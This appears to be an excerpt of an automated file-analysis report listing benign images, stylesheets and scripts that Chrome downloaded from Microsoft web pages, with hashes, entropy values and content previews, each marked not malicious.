                                                                                                                                                              Preview:RIFF*;..WEBPVP8 .;...-...*..&.>...A..^_6..a,...t..p..8.l.\.4...k...j.{.W...=s...?.z^y..s....... .....?..........?:...G....#.........).w..........?.D......./.?......=.3..._._....4...w.....o...../..................{....W.....................G.......c...p...+.?.......?...........).+........?..k?...............g.........g.G.#..._._........u........._.............O.....E..?y.n?..........?......2..........e.{.c._.>;............7...w...:.._.....|..................._....o.....?.....?...}....;.....?.?....+.q...|<...?.?.~.~....G......y...........Y?....G.......~..n...../...O....i...w.o._.~...>.........._......#...........?.~/...+............._._.........................).....o._...?._..5.......<......6!..|....o.A....;.1..-t..w.[.4z..JG*....oH....l..F.?...........^+..v....l.....5Q..:g.".|1.\.n.~..1.].r.7..\..t....X..E.<.......T...#.8p5..4t.........Yi..2Ci.j...G^..{.2...... g.wBo.A....;.1.].r.7."..h...v.....%...?.........M...u+...t.U..E.{............h..q]B.....q
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 212 x 225, 8-bit/color RGBA, non-interlaced
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):16026
                                                                                                                                                              Entropy (8bit):7.980694085154729
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7C1F61EA35F60BD8155A2E0EC6F383A4
                                                                                                                                                              SHA1:3824ECCFD954548348D1EBA01B7082F09F9A6AEA
                                                                                                                                                              SHA-256:454549C8AA1A62F6193C540C81B5986F547F5E29D05860B7F6B3517BCB1B2DCB
                                                                                                                                                              SHA-512:2EA92AC0F19A55326CD2A380EE2F8F67742B835006085CAAFDB5FED4F4FCE8D32DED634B5C51C7699FDA2A21CA062E4BCD97210B5A27EEAAD1A399218EF8AB79
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:.PNG........IHDR..............i......sRGB.........gAMA......a...>DIDATx..wx...G...~q...9/...I..9..Il.w......b............H.@4.D....i..^$.]...I;..ZiWe.w.... l.....;.`....{.g8...`0.....`0.....`0.....`0.....`0.....`0.....`0....c........Z5.0.....`0.*..{..k..(..W.7j....1.....Mx......~J. .....5U..1.....2..2.C..M........F..1.....6..%JD..."...!......0.u..L...1.....2@-LAY.."..0B.`.B..!.#...e.v.~.c0.7s...5....V._$.\....m..7E..bRd.v.^e..q..1...L..~..c..I{$.O..AFH.cF.D..b....[6.W.......|{...T..;#..1.H!.....1CE..Y...6..H&...<......K|.O#hQ...B..!.-.$.S-KDK=..Y.@.Dr..1.c0.X..^.{...t...[.9.Q..&X5............q.H(...P..4.......jU..E...0"..b.......x.C.TT...#4..|U.(..x...36/.F.E!..x(.C.."Jc.8.b#......t.L.U..~.c0.Vh...bQ..r.$/.!.3P.0...K.H-.:4..V..O]..1..+.T.....\BP..nj*:,.....5.e..Bm.ZoY..:.W...c0.F.]...E..|...".*qL5.-.$U..50o..J.8.d:<...}.7.R.._u....x..e.oQ.#n!...a..ZH|.L..-..T......._..(Z..V.z.....1..x.......2.m..3..C.......'..Q...){.`..'.7.FM@..W8.....tx...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (510)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1973
                                                                                                                                                              Entropy (8bit):4.4914538760871165
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:81B1EF0C4A6B80454291234FCD6E45B0
                                                                                                                                                              SHA1:1353F3119D378FFB222149AE19755423EF5347BE
                                                                                                                                                              SHA-256:B05D865A37D5EFC60E028BC9FBC6B63459C78D21B0B70B3797AC97C1AD9BA88D
                                                                                                                                                              SHA-512:6409931AF06BAE75E4CFC57FF2B877915404A9D805F8C9076390C4BC8FF634BA96B2ED561FCC4E57869110E62BE05AB75A1578E7935CEC9605EAA77C893643AD
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/reimagine/clientlib-reimagine-base.min.ACSHASH81b1ef0c4a6b80454291234fcd6e45b0.css
                                                                                                                                                              Preview:[data-oc-token-text]{display:contents}..editorial-article--chapter .editorial-article__slot .block-heading h1,.editorial-article--chapter .editorial-article__slot .block-heading h2,.editorial-article--chapter .editorial-article__slot .block-heading h3,.editorial-article--chapter .editorial-article__slot .block-heading h4,.editorial-article--chapter .editorial-article__slot .block-heading h5,.editorial-article--chapter .editorial-article__slot .block-heading p{margin-block:var(--root-spacing-xl)}..editorial-article--chapter .editorial-article__slot .block-heading h1:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h2:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h3:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h4:first-child,.editorial-article--chapter .editorial-article__slot .block-heading h5:first-child,.editorial-article--chapter .editorial-article__slot .block-heading p:first-child{ma
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):175
                                                                                                                                                              Entropy (8bit):4.68043398329258
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:96F0C5B1219E39B8788028F5C17A5AD9
                                                                                                                                                              SHA1:D6DCE0DE065B0D13905EAEDA0BA5C0DEA3D8F67C
                                                                                                                                                              SHA-256:1FC2BCE2D46DF4565B8C488B22225CFE7ADB7C37CC9A542D4F85B61995B306CB
                                                                                                                                                              SHA-512:057810FA0558506C6B8ABECB1A7A58FF61DA0609B3A5798BB42DE3A9B801CA0D8B20C4C1F9A250EE33D30492452CC5C4553332B16300408AA0C45B1515D4AF10
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/cascade.component.authoring/clientlibs/clientlib-cookieconsent.min.ACSHASH96f0c5b1219e39b8788028f5c17a5ad9.js
                                                                                                                                                              Preview:'use strict';function AEMOnCookieConsentChangedCallback(a){}if("undefined"!=typeof WcpConsent&&null!=WcpConsent)WcpConsent.onConsentChanged(AEMOnCookieConsentChangedCallback);
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1307
                                                                                                                                                              Entropy (8bit):4.05366276609281
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:91A74FFF6AEA23866EF7201C4CE49EB8
                                                                                                                                                              SHA1:F3B6060FB7E0F87FFE3F8ADD6D9EED68B815023F
                                                                                                                                                              SHA-256:BCCC4BCF75C10ADEDE4F71B4FE5F36159E835DC63CB2713EB2E0467DFE581D8A
                                                                                                                                                              SHA-512:6A055EFA75A5917A2DC8B2C0CDE6C02F2ADC2F6DEBF5D4C74351AF5A12A207548F8D2C5EAAEB3F91D99016EA7DF93DA69C2D4445EC4A20DEE1FEF170AE04DA4C
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases6?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M0.666016 4.83333C0.666016 2.4401 2.60612 0.5 4.99935 0.5H20.3327C22.7259 0.5 24.666 2.4401 24.666 4.83333V20.1667C24.666 22.5599 22.7259 24.5 20.3327 24.5H4.99935C2.60611 24.5 0.666016 22.5599 0.666016 20.1667V4.83333ZM4.99935 2.5C3.71068 2.5 2.66602 3.54467 2.66602 4.83333V5.16667H22.666V4.83333C22.666 3.54467 21.6213 2.5 20.3327 2.5H4.99935ZM2.66602 20.1667C2.66602 21.4553 3.71068 22.5 4.99935 22.5H20.3327C21.6213 22.5 22.666 21.4553 22.666 20.1667V7.16667H2.66602V20.1667ZM5.79935 9.16667H10.1993C10.8253 9.16667 11.3327 9.67408 11.3327 10.3V19.3667C11.3327 19.9926 10.8253 20.5 10.1993 20.5H5.79935C5.17343 20.5 4.66602 19.9926 4.66602 19.3667V10.3C4.66602 9.67407 5.17343 9.16667 5.79935 9.16667ZM6.66602 18.5H9.33268V11.1667H6.66602V18.5ZM12.666 10.1667C12.666 9.61438 13.1137 9.16667 13.666 9.16667H19.666C20.2183 9.16667 20.666 9.61438 20.666 10.1667C20.666 10.719 20.2183 11.1667 1
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (52717), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):52717
                                                                                                                                                              Entropy (8bit):5.462668685745912
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:413FCC759CC19821B61B6941808B29B5
                                                                                                                                                              SHA1:1AD23B8A202043539C20681B1B3E9F3BC5D55133
                                                                                                                                                              SHA-256:DAF7759FEDD9AF6C4D7E374B0D056547AE7CB245EC24A1C4ACF02932F30DC536
                                                                                                                                                              SHA-512:E9BF8A74FEF494990AAFD15A0F21E0398DC28B4939C8F9F8AA1F3FFBD18056C8D1AB282B081F5C56F0928C48E30E768F7E347929304B55547F9CA8C1AABD80B8
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:var WcpConsent;!function(){var e={229:function(e){window,e.exports=function(e){var t={};function o(n){if(t[n])return t[n].exports;var r=t[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,o),r.l=!0,r.exports}return o.m=e,o.c=t,o.d=function(e,t,n){o.o(e,t)||Object.defineProperty(e,t,{enumerable:!0,get:n})},o.r=function(e){"undefined"!=typeof Symbol&&Symbol.toStringTag&&Object.defineProperty(e,Symbol.toStringTag,{value:"Module"}),Object.defineProperty(e,"__esModule",{value:!0})},o.t=function(e,t){if(1&t&&(e=o(e)),8&t)return e;if(4&t&&"object"==typeof e&&e&&e.__esModule)return e;var n=Object.create(null);if(o.r(n),Object.defineProperty(n,"default",{enumerable:!0,value:e}),2&t&&"string"!=typeof e)for(var r in e)o.d(n,r,function(t){return e[t]}.bind(null,r));return n},o.n=function(e){var t=e&&e.__esModule?function(){return e.default}:function(){return e};return o.d(t,"a",t),t},o.o=function(e,t){return Object.prototype.hasOwnProperty.call(e,t)},o.p="",o(o.s=3)}([function(e,t,o)
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):2432
                                                                                                                                                              Entropy (8bit):4.834130257531367
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:F25FEC6821F63D701A6B6291A4011894
                                                                                                                                                              SHA1:1260AC884282372B86F3A600BA8903AD75983E67
                                                                                                                                                              SHA-256:DD8619BE444CCE5F8DB053215BB018C0BBC09AF7BAA9E66618BDF041B0A2E09C
                                                                                                                                                              SHA-512:1F3C21E2C32DC8362A1CA12801FEC56BD22CDAF0BB7FB8D0D118348019EB843A63A171154BB0392DFEE268C5727F47CF139144596C0DFB7D12125CE659DB35C9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/clientlibs/clientlib-click-group-telemetry.min.ACSHASHf25fec6821f63d701a6b6291a4011894.js
                                                                                                                                                              Preview:/**. * Send telemetry data when a Click Group is clicked, if the clicked element. * is not the target/anchor/button itself.. */.(() => {. const ACTION_TYPES = {. LEFT_CLICK: 'CL'. };.. const EventName = {. CLICK: 'click'. };.. let analytics = null;.. /**. * Get dataBi attributes from an element's dataset. * @param {HTMLElement} element - The element to get dataBi attributes from. * @returns {Object} - An object containing the dataBi attributes. */. const getDataBi = (element) => {. if (!element || !element.dataset) {. return {};. }.. return Object.fromEntries(. Object.entries(element.dataset). .filter(([key]) => key.startsWith('bi') && key.charAt(2) === key.charAt(2).toUpperCase()). .map(([key, value]) => [. key.charAt(2).toLowerCase() + key.slice(3),. value. ]). );. };.. /**. * Send telemetry data to the analytics plugin. * @param {string} behaviorId - The behavior ID. * @param {string} actionTyp
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1739
                                                                                                                                                              Entropy (8bit):4.05445408846263
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:2D2AAD649742385AEBE585E25E433E32
                                                                                                                                                              SHA1:6510C1B80C83B1996337CB01580AC62C89623B1F
                                                                                                                                                              SHA-256:A8BE8B07C5EC53009017FF86D0FBED11A706B22332F1BFB1AE5FD1B84638F94B
                                                                                                                                                              SHA-512:32AFE4FF96112017F6FFF8A9CAF377CFB1248B2B9078818D065CF70D0FB82C894B850FD085164BFE2325BA54394E6B5A6DBC6FEF094FAE177C547DA958E400B7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/content/microsoftcorp/Use-Cases1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=32&hei=32&qlt=100&fmt=png-alpha&fit=constrain"
                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M6.25 12.4974C7.2165 12.4974 8 13.2809 8 14.2474V16.7474C8 17.7139 7.2165 18.4974 6.25 18.4974H3.75C2.7835 18.4974 2 17.7139 2 16.7474V14.2474C2 13.2809 2.7835 12.4974 3.75 12.4974H6.25ZM13.25 12.4974C14.2165 12.4974 15 13.2809 15 14.2474V16.7474C15 17.7139 14.2165 18.4974 13.25 18.4974H10.75C9.7835 18.4974 9 17.7139 9 16.7474V14.2474C9 13.2809 9.7835 12.4974 10.75 12.4974H13.25ZM20.25 12.4974C21.2165 12.4974 22 13.2809 22 14.2474V16.7474C22 17.7139 21.2165 18.4974 20.25 18.4974H17.75C16.7835 18.4974 16 17.7139 16 16.7474V14.2474C16 13.2809 16.7835 12.4974 17.75 12.4974H20.25ZM6.25 13.9974H3.75C3.61193 13.9974 3.5 14.1094 3.5 14.2474V16.7474C3.5 16.8855 3.61193 16.9974 3.75 16.9974H6.25C6.38807 16.9974 6.5 16.8855 6.5 16.7474V14.2474C6.5 14.1094 6.38807 13.9974 6.25 13.9974ZM13.25 13.9974H10.75C10.6119 13.9974 10.5 14.1094 10.5 14.2474V16.7474C10.5 16.8855 10.6119 16.9974 10.75 16.9
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):43
                                                                                                                                                              Entropy (8bit):2.9889835948335506
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:B4491705564909DA7F9EAF749DBBFBB1
                                                                                                                                                              SHA1:279315D507855C6A4351E1E2C2F39DD9CD2FCCD8
                                                                                                                                                              SHA-256:4E0705327480AD2323CB03D9C450FFCAE4A98BF3A5382FA0C7882145ED620E49
                                                                                                                                                              SHA-512:B8D82D64EC656C63570B82215564929ADAD167E61643FD72283B94F3E448EF8AB0AD42202F3537A0DA89960BBDC69498608FC6EC89502C6C338B6226C8BF5E14
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://us-u.openx.net/w/1.0/sd?id=537148856&val=Z1yyUwAAAJINJAO-&cc=1
                                                                                                                                                              Preview:GIF89a.............!.......,...........D..;
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):2714
                                                                                                                                                              Entropy (8bit):3.88910583811547
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:6DAED1E6E97ABE3DE61F9C2316C3EC4A
                                                                                                                                                              SHA1:5D7369742BC9211CD82DEF74ECE49AAE6E09F384
                                                                                                                                                              SHA-256:C8FAD58FB046C7BF1C02E506300FD49B34156CCDD3123C755E9BC61C259DDD14
                                                                                                                                                              SHA-512:A3149E4E36F2998F30C7458F42DF741FA4F82DA3E28174D836A52C75565BE29AE2ECD6F508853D2D0C015A6DC1B141C652A19A13B5CB031548024580FEB30776
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M15.2963 15.8965C16.4558 15.8965 17.3958 16.8365 17.3958 17.996L17.3945 19.1502C17.5345 21.7765 15.5818 23.1057 12.0772 23.1057C8.58737 23.1057 6.59841 21.7982 6.59841 19.1957V17.996C6.59841 16.8365 7.53839 15.8965 8.69791 15.8965H15.2963ZM15.2963 17.6961H8.69791C8.53226 17.6961 8.39798 17.8304 8.39798 17.996V19.1957C8.39798 20.6068 9.46173 21.3061 12.0772 21.3061C14.6781 21.3061 15.6713 20.6301 15.5963 19.1981V17.996C15.5963 17.8304 15.462 17.6961 15.2963 17.6961ZM2.0995 9.89798L7.34943 9.89808C7.25075 10.2815 7.19827 10.6835 7.19827 11.0977C7.19827 11.3006 7.21086 11.5005 7.23531 11.6968L2.0995 11.6975C1.93385 11.6975 1.79957 11.8318 1.79957 11.9975V13.1972C1.79957 14.6083 2.86331 15.3075 5.47883 15.3075C6.03298 15.3075 6.51415 15.2768 6.92755 15.2147C6.24951 15.6442 5.74117 16.3152 5.52014 17.1061L5.47883 17.1071C1.98896 17.1071 0 15.7996 0 13.1972V11.9975C0 10.838 0.939976 9.897
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (1578)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):344673
                                                                                                                                                              Entropy (8bit):4.96730351838445
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:C14F93E32185A9F2F08D1896BB19DE6E
                                                                                                                                                              SHA1:9668A879A6142E6E75148E2CF41203177E0411B6
                                                                                                                                                              SHA-256:68982E0A892E454C05AF6058360AE8BD06122E0195604C567C81AF99F113545A
                                                                                                                                                              SHA-512:DC2B8DE6863363F94F5B193FB88870C6CB84C56F10F0A29F9AAFB3CFDE469F104630F57D2B1500D8B87081344D747E6293FF4A97A6C2D2B434EB4F92283BD5F7
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:var engagementFix = (function () {. var engEl;.. function focus(eng) {. //Jaime MR test change setting upstream. // Run if a button was detected. if (eng.engagementType === 5) {. // Look in dom for a role of button. We only need to do this once because each button load will cause this to run.. setTimeout(function () {. var button = document.querySelector('[role="button"]');.. if (button) {. button.removeAttribute('role');. }. }, 200);. }.. if (eng.engagementType === 23) {. document.querySelectorAll('[data-LP-event="close"]')[0].click();. }.. engEl = document.getElementById('chatEngagement');.. if (engEl != null) {. setTimeout(function () {. document.getElementById('chatEngagement').focus();. }, 200);. } else {. setTimeout(function () {. var engageme
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1748
                                                                                                                                                              Entropy (8bit):3.996779045636375
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:DC1E0183B38AC7A568B97DF4FBAE12E5
                                                                                                                                                              SHA1:710E6D103C5EBD066A299F7E09E8F6E152F20351
                                                                                                                                                              SHA-256:E7D5E26B96D1C3FF0A8829E603A299637FE62D1F280547E7DBB8126CB9FEF323
                                                                                                                                                              SHA-512:1ADC9D87631B8454CAA9C5557E7CD4D5C51B8C7F335FBA88AC32BBDECD5A09518B53D77AB79A4B6BAFED0F31362FAB28BF2444AFC37EDE6DE4BCCFCCBFC4FEC4
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:<svg width="25" height="25" viewBox="0 0 25 25" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M4.65065 0.5H12.684C15.068 0.5 17.0007 2.43264 17.0007 4.81667V5C17.0007 5.46024 16.6276 5.83333 16.1673 5.83333C15.7071 5.83333 15.334 5.46024 15.334 5V4.81667C15.334 3.35311 14.1475 2.16667 12.684 2.16667H4.65065C3.1871 2.16667 2.00065 3.35311 2.00065 4.81667V12.85C2.00065 14.3136 3.1871 15.5 4.65065 15.5H12.3944C12.7079 13.7933 14.2033 12.5 16.0007 12.5C18.0257 12.5 19.6673 14.1416 19.6673 16.1667C19.6673 18.1917 18.0257 19.8333 16.0007 19.8333C14.3223 19.8333 12.9073 18.7057 12.472 17.1667H4.65065C2.26662 17.1667 0.333984 15.234 0.333984 12.85V4.81667C0.333984 2.43264 2.26662 0.5 4.65065 0.5ZM14.0007 16.1667C14.0007 17.2712 14.8961 18.1667 16.0007 18.1667C17.1052 18.1667 18.0007 17.2712 18.0007 16.1667C18.0007 15.0621 17.1052 14.1667 16.0007 14.1667C14.8961 14.1667 14.0007 15.0621 14.0007 16.1667ZM7.66732 20.3333V20C7.66732 19.5398 8.04041 19.1667 8.50065 19.1667C8.96089 19.1667
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (501)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):1713
                                                                                                                                                              Entropy (8bit):5.575734231309711
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:827F5933B56EA80DD32ABBF6BB243F9D
                                                                                                                                                              SHA1:ED781E3BE6BCBACC7D947E125442AE8BC7F1F6C4
                                                                                                                                                              SHA-256:94384E3945A077BF61929E69DF5F72A99E74D3AD21FFB2124268331924FD1A83
                                                                                                                                                              SHA-512:994B3C7C4FBAD540D43181BCBAD68F709C0C0F8AAD8CC2B5A2AEC22AA79A4D45C84D2028A75A16EFF67CC095680D2904BBD66DE163463F0DEC6CC4BE68770664
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(self["webpackChunk_canva_web"] = self["webpackChunk_canva_web"] || []).push([[6590],{../***/ 117618:.function(_, __, __webpack_require__) {__webpack_require__.n_x = __webpack_require__.n;const __web_req__ = __webpack_require__;__web_req__(813110);self._fe4d99ebe0d2d259646a80d250150d47 = self._fe4d99ebe0d2d259646a80d250150d47 || {};(function(__c) {var Pr,Nr,Or,Mr;.__c.Ef=class{static create(a,b,c,d){return new __c.Ef(a,b,c,d)}async track(a){if(this.active){var b;if(b="undefined"===typeof URLSearchParams?null:(new URLSearchParams(this.global.location.search)).get("ovid")){a=a.event;var c=Mr.get(a);c&&(b={account_id:this.config.Fh,project_id:this.config.projectId,client_name:Nr,client_version:Or,anonymize_ip:!0,enrich_decisions:!0,visitors:[{visitor_id:b,snapshots:[{decisions:[],events:[{timestamp:this.V.now(),uuid:this.Jl(),key:a,entity_id:c,tags:[]}]}]}]},.this.sendEvent(b))}}}async reset(){}sendEvent(a){a={url:Pr,method:"POST",headers:{"Content-Type":"application/json"},body:JSON.stri
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):60471
                                                                                                                                                              Entropy (8bit):7.996957430165955
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:E7F0A3B3C1D7DA8CA4B8F4CA2C0B6E3B
                                                                                                                                                              SHA1:3A4EB9BE439125EC003ED33AB1DBE9C35D76D9CE
                                                                                                                                                              SHA-256:B4F9983E48F5B91F567AA7FEFB984A4030D6E1C94A0FA9602B42C327040637E1
                                                                                                                                                              SHA-512:FAB386EFAB34DEAD3C7E6801E69291DC94D41EE2852698528FC709440F67B92E8942031B2EC8B1361549767947839DBDCC7F5FF5A6DBA2E90A5C1ED5DFABDA02
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_PBIPro_5.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D....................(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma..................%mdat.....*..%..B2....,.M4.A$@....p...,p..D*.u..... .xs..r...B.i.oF... ...+......'.....c&.U....1..:l..O/B.0(..Ug..B.I_a!sK[..c...O]z.s.CE...},.Z........o..rOu.....O..9..-..x.P..4......`.W..s..-.]...G....,l.........w...M..3..v..T...../.JE...y.V....V...`.dq.@.;....o....tI...a.v.]v........u.E.......9^.0A........CH...10.m..E..0..y.g0^i.1..+Kf.l..Fuh...=Vz."Z.r..O...48.h..wk.....H.G.w.-..%(.......H.s..g..7.......M......n.....d+..Cu%.+C..-...r.!/.1.u....}-]s.m.4{.Z6..8&.:B..Z.I<...........^xqm...sx.S...h.*Fi....?.B.U..>.......z.Wo.M.Ua..6......^..:..1..e_.C...)..m......{`.+.....E....{.`|`s.,[.#.j,.sgT....a.Xc5.'.y.).5..!^ ..0.y.!3.|.4..|....m.^b.5......b].}.\>..H;.!..\.x~.dH
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:PNG image data, 33 x 8, 8-bit/color RGB, non-interlaced
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):61
                                                                                                                                                              Entropy (8bit):4.002585360278503
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:94E22DFDBC1C76436B2836A11C6220F5
                                                                                                                                                              SHA1:F8E18F453060F93024C2ADCEBCE31969BB011E8E
                                                                                                                                                              SHA-256:8985FF2C3EE225E5D3B60739B71F46C9F3529BF87F1E1542181821169BFC8907
                                                                                                                                                              SHA-512:75E2B5044B2F099A2AFBB81D8DBC1737951154E5695528494F66D025DFD2C801D3166A092884A68EE55EBFA28355DBC4FDAC52E98BB83CB98AB585648AC68EFB
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/i/8f1950932edc423f/1734128150890/kT-SMP_tRYcDlrN
                                                                                                                                                              Preview:.PNG........IHDR...!..........%......IDAT.....$.....IEND.B`.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):9849
                                                                                                                                                              Entropy (8bit):4.327507698755054
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:08C5F9CB4220E78FF920DAE3A7A8ED53
                                                                                                                                                              SHA1:06063CC0DE00B0F698B07DEB66DDEDE5C60940E7
                                                                                                                                                              SHA-256:E8B12100E50470AE78CA039D5662394A89E01C61FE8D4682DFE606E906E677ED
                                                                                                                                                              SHA-512:0E7ED8C068FA14123041314F58C1473DF3EB60C3B6CE1A95B1A7066C1B151D5D7EC6F2D585B2862721DB164B9CE79E61DFB6FB0A53951504BB2235739B4C35F6
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(function() {. "use strict";.. var $uhfSkipToMain = $("#uhfSkipToMain");. var $acomHeaderSkipToMain = $(".azure-skip-nav");. var href = "";. if($uhfSkipToMain.length) {. href = $uhfSkipToMain.data("href");. href = href && href.replace("#", "") || "mainContent";. } else if($acomHeaderSkipToMain.length) {. href = $acomHeaderSkipToMain[0].getAttribute("href");. href = href && href.replace("#", "") || "main";. }.. $('.microsoft-template-layout-container').attr("id", href);.})();.// This function replaces popover data-island tags insertd in RTE via the popover plugin.(function () {. if (!window || !window.ocrReimagine) {. return;. }.. window.ocrReimagine.PopoverRichTextPlugin = new class {. popoverRichTextMountSelector = '.popover-rte-mount';. popoverMountSelector = '[data-mount="popover"]';.. isPopoverComponentEnabled() {. return !!(window.mwf?.Popover);. }.. isIconComponentEna
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (584)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):6798
                                                                                                                                                              Entropy (8bit):5.383941368080596
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1DABD5CC3F7B68C178B59EA74DC62947
                                                                                                                                                              SHA1:B8DF9D8FD267B8B74325667DC97278CCC90A1464
                                                                                                                                                              SHA-256:E49EFB0A75AF4995902362EA679A0FC4EB120A881A090CB8424D5CBD183436A2
